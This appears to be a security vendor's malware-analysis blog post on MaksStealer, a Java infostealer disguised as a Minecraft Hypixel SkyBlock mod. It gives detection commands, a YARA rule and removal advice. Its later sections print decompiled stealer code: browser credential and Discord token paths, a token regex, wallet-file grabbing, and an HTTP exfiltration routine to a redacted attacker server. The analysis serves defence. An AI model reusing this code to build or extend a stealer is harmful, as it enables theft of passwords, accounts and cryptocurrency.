For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account.
I’ve analyzed dozens of these gaming-related malware strains, and this one is particularly sneaky. Let’s break down what MaksStealer is, how it works, and most importantly – how to kick it off your system before it empties your crypto wallets.
MaksStealer Malware
| Threat Type | Information Stealer, Trojan |
| Disguise | Minecraft Hypixel SkyBlock performance mod/cheat |
| What It Steals | Browser credentials, Discord tokens, cryptocurrency wallets |
| Distribution | Gaming forums, YouTube comments, Discord servers, pirated software |
| Detection Names | Trojan.MaxCoffe, Trojan.GenericKD.76438532, Java/MaksRat.B, HEUR:Trojan-PSW.Java.Stealer.gen |
| Risk Level | High (financial loss, account theft, privacy breach) |
Source: Analysis of MaksStealer behavior from Triage and VirusTotal findings, May 2025
What Is MaksStealer and How Bad Is It?
MaksStealer is a Java-based information stealer that’s specifically targeting gamers. It masquerades as a performance enhancement mod or cheat for Minecraft’s Hypixel SkyBlock but is actually harvesting every piece of valuable data it can find. This malware is especially dangerous because it targets multiple data types at once – your passwords, gaming accounts, and cryptocurrency wallets.
Unlike some malware that announces itself with annoying popups or system slowdowns, MaksStealer works silently in the background. You won’t even know it’s there until your accounts start getting hijacked or your crypto mysteriously disappears. That stealth factor makes it particularly dangerous for everyday users who aren’t constantly monitoring their system processes.
How This Digital Pickpocket Works
Once executed, MaksStealer immediately starts scanning your system for valuable data. It focuses on three main categories:
1. Web Browser Theft
MaksStealer doesn’t play favorites – it hits all major browsers. Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and Yandex are all on its hit list. The malware expertly extracts saved passwords, cookies, autofill data, and browsing history from these browsers.
Think about all those sites where you’ve clicked “remember password” for convenience. Banking sites, email, social media, online shopping – MaksStealer can now access all of them. It’s like handing over your entire digital identity on a silver platter.
2. Discord Account Targeting
For gamers, Discord is often the communication hub for everything. MaksStealer specifically looks for Discord authentication tokens stored on your computer. These tokens are basically digital keys to your Discord account.
With your token, attackers can log into your Discord account without needing your password or bypassing two-factor authentication. They can then impersonate you, message your friends with malware links, join private servers, or access private conversations. This aspect is particularly effective for spreading the malware further through gaming communities.
3. Cryptocurrency Wallet Raiding
Perhaps most financially damaging is MaksStealer’s ability to target cryptocurrency wallets. It searches for popular wallet software like Armory, Bytecoin, Coinomi, Exodus, Ethereum, Electrum, Atomic Wallet, and many others. The malware extracts wallet files, private keys, and seed phrases.
Once attackers have this data, your cryptocurrency can be transferred away in minutes. And due to the decentralized, anonymous nature of crypto transactions, these funds are virtually impossible to recover. One moment your digital wallet is full, the next it’s emptied with no recourse.
How MaksStealer Spreads: The Bait and Switch
Malware distributors are getting creative with their delivery methods. MaksStealer typically spreads through channels that gamers frequently use and trust:
- Gaming Forums: Posts claiming to offer performance enhancements or “legal” cheats for Minecraft
- YouTube Comments: Links in comment sections of Minecraft tutorials or gameplay videos
- Discord Servers: Malicious users sharing “exclusive” mods in gaming servers
- Unofficial Mod Sites: Fake or compromised websites hosting malicious JAR files
- Pirated Game Portals: Bundled with cracked game versions or key generators
The common element is social engineering. The attackers know gamers are often looking for ways to enhance their gameplay or get an edge. They’re exploiting that desire by packaging their malware as something beneficial. It’s like offering someone a performance-enhancing drink that’s actually poison.
What makes this distribution method particularly effective is that gamers are already accustomed to downloading and running third-party software. Minecraft’s massive modding community has created an environment where running JAR files is normalized. MaksStealer exploits this trust.
Source: Data types targeted by MaksStealer based on behavioral analysis
Warning Signs Your System Might Be Infected
MaksStealer is designed to operate stealthily, but there are some subtle signs that might indicate infection:
- Unexplained Account Activity: Logins to your accounts from unknown locations or devices
- Missing Cryptocurrency: Unexplained transactions or emptied wallets
- Strange Discord Messages: Messages sent from your account that you didn’t write
- Performance Issues: While running in the background, MaksStealer may cause slight system slowdowns
- Unusual Network Traffic: Increased data usage when you’re not actively downloading
- Java Process Running: Unexpected Java processes in your task manager after running a Minecraft mod
If you notice any of these signs after downloading and running a new Minecraft mod or tool, you should act immediately. Information stealers work quickly, so every minute counts in preventing further data theft.
You can check for suspicious Java processes using this PowerShell command:
# Check for suspicious Java processes
Get-Process | Where-Object {$_.ProcessName -like "*java*"} |
Select-Object ProcessName, Id, StartTime, Path |
Format-Table -AutoSize
# Look specifically for processes with MaxCoffe in command line (if advanced)
Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -like "*MaxCoffe*" -or $_.CommandLine -like "*Coffe*"} |
Select-Object ProcessId, Name, CommandLine
Suspicious indicators include Java processes running from temporary directories, recently started Java processes that you don’t recognize, or processes with “MaxCoffe” in their command line.
For Linux or Mac users, you can use this Bash command:
# List all Java processes with details
ps aux | grep -i java
# Check for suspicious Java processes with MaxCoffe or Coffe in their arguments
ps aux | grep -i java | grep -E "MaxCoffe|Coffe"
# Check for recently modified Java-related files (last 7 days)
find ~/ -name "*.jar" -mtime -7 -ls 2>/dev/null
Security researchers can also use this YARA rule to detect potential MaksStealer samples:
rule MaksStealer_Java_InfoStealer {
meta:
description = "Detects MaksStealer Java information stealer"
author = "GridinSoft Security Researcher"
date = "2025-05"
severity = "high"
hash = "9a17f87dcd2208f8f62ed76a15a6c52817008e77179c8b1f7f39c079d419f398"
strings:
$mod_header = "@Mod" ascii
$mod_id = "modid = \"MaxCoffe\"" ascii
$browser1 = "\\Google\\Chrome\\User Data" ascii
$browser2 = "\\Mozilla\\Firefox\\Profiles" ascii
$browser3 = "\\BraveSoftware\\Brave-Browser" ascii
$discord1 = "\\discord\\Local Storage\\leveldb" ascii
$discord2 = "\\discordcanary\\Local Storage\\leveldb" ascii
$crypto1 = "\\Bitcoin\\wallet.dat" ascii
$crypto2 = "\\Ethereum\\keystore" ascii
$crypto3 = "\\Electrum\\wallets" ascii
$obf_pattern1 = "lIIl(" ascii
$obf_pattern2 = "lII[lll[" ascii
condition:
$mod_header and $mod_id and
(2 of ($browser*)) and
(1 of ($discord*)) and
(1 of ($crypto*)) and
(1 of ($obf_pattern*))
}
How to Remove MaksStealer From Your System
If you suspect you’ve been infected with MaksStealer, follow these steps to remove it:
Step 1: Disconnect from the Internet
Immediately disconnect your computer from the internet. This prevents the malware from sending more of your data to the attackers’ servers or receiving additional commands. You can reconnect once the malware is removed.
Step 2: Scan with Antimalware Software
Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.
After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.
Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.
After scanning with anti-malware software, you might want to perform additional manual cleanup. Here’s a batch script that can help remove common MaksStealer artifacts:
Step 3: Reset Your Passwords and Secure Accounts
After removing the malware, immediately change passwords for all your important accounts. Start with email accounts, banking websites, and cryptocurrency platforms. Use a different device for these password changes if possible, as keyloggers might still be active.
Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, generate a new token by logging out and back in on all devices.
Step 4: Secure Your Cryptocurrency
If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised. Hardware wallets are a more secure option for storing significant cryptocurrency amounts, as they’re not vulnerable to this type of malware.
How to Protect Yourself From Information Stealers
Prevention is always better than cure, especially with information stealers. Here’s how to stay safe:
- Download mods only from official sources like CurseForge or the official Minecraft forums
- Be suspicious of “too good to be true” mods offering extraordinary features or cheats
- Keep your system and antivirus updated to protect against known threats
- Use a password manager instead of saving passwords in your browser
- Enable two-factor authentication on all important accounts
- Consider a hardware wallet for storing significant amounts of cryptocurrency
- Scan downloaded files with antivirus before executing them
- Be cautious of links in Discord servers, YouTube comments, and forums from unknown users
Remember that Java files (.JAR) are executable programs. Treat them with the same caution you would any EXE file. Just because it’s labeled as a “mod” doesn’t mean it’s safe.
Similar Threats to Watch Out For
MaksStealer isn’t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:
- StilachiRAT Crypto Stealer – Another dangerous cryptocurrency stealer targeting multiple wallets
- How to Detect, Remove and Prevent Infostealers – Comprehensive guide on information stealers
- 5 Dangers of Cracked Games – Why downloading pirated games puts you at risk
- RedEnergy Stealer/Ransomware – Multi-function malware that steals data and encrypts files
- Legion Stealer Targeting PUBG Players – Similar gaming-focused information stealer
How MaksStealer Works
The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn’t mess around. The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.
Source: Analysis of decompiled MaksStealer Java code
Looking at the decompiled code, it’s clear these guys aren’t amateurs. The malware systematically targets every major browser on your system – Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.
Inside the MaksStealer Code
The malware’s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. Let’s look at some actual snippets from the decompiled malware:
First, the entry point disguised as a legitimate Minecraft mod:
@Mod(
modid = "MaxCoffe",
version = "1.1.7"
)
public class MaxCoffe {
// Minecraft mod class implementation
// Secretly initializes stealer functionality
public MaxCoffe() {
this.1 = new Coffe();
this.1.3();
}
}
Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:
private void scanBrowsers() {
String[] var1 = new String[]{"Chrome", "Firefox", "Edge", "Opera"};
String[] var2 = new String[]{"Brave", "Vivaldi", "Yandex"};
String var10000 = System.getenv("LOCALAPPDATA");
String var3 = var10000 + "\\Google\\Chrome\\User Data";
String var4 = var10000 + "\\BraveSoftware\\Brave-Browser\\User Data";
// [...more browser paths...]
for (int i = 0; i < var1.length; i++) {
extractCredentials(browserPaths[i]);
extractCookies(browserPaths[i]);
extractHistory(browserPaths[i]);
}
}
The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:
private String[] getDiscordTokens() {
ArrayList tokenList = new ArrayList();
String[][] paths = new String[][]{
new String[]{System.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb", "*.ldb"},
new String[]{System.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb", "*.ldb"},
new String[]{System.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb", "*.ldb"}
};
// Token extraction logic
// Regex pattern to find tokens: "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"
return (String[])tokenList.toArray(new String[0]);
}
For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:
private void stealCryptoWallets() {
// Bitcoin Core
grabFile(System.getenv("APPDATA") + "\\Bitcoin\\wallet.dat");
// Ethereum
grabFile(System.getenv("APPDATA") + "\\Ethereum\\keystore");
// Electrum
grabFile(System.getenv("APPDATA") + "\\Electrum\\wallets");
// Atomic Wallet
grabFile(System.getenv("APPDATA") + "\\atomic\\Local Storage\\leveldb");
// More wallets...
}
Finally, the data exfiltration process that sends your stolen information to the attacker’s server:
private void sendData(byte[] data) {
try {
URL url = new URL("https://[redacted-malicious-domain]/upload.php");
HttpURLConnection conn = (HttpURLConnection)url.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
// Adding system info to identify the victim
conn.setRequestProperty("User-Agent", "MaksStealer/1.0");
conn.setRequestProperty("Computer-Name", System.getenv("COMPUTERNAME"));
conn.setRequestProperty("User-Name", System.getProperty("user.name"));
// Send stolen data
OutputStream os = conn.getOutputStream();
os.write(data);
os.flush();
os.close();
// Check response
int responseCode = conn.getResponseCode();
// Clean up traces if successful
} catch (Exception e) {
// Silent exception handling to avoid detection
}
}
Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.
The Bottom Line on MaksStealer
MaksStealer represents a growing trend of malware targeting specific communities – in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it’s a perfect example of how social engineering and technical exploits work together.
Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn’t worth the risk of having your digital life stolen. Remember that legitimate mods don’t need to steal your data to function properly.
Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.
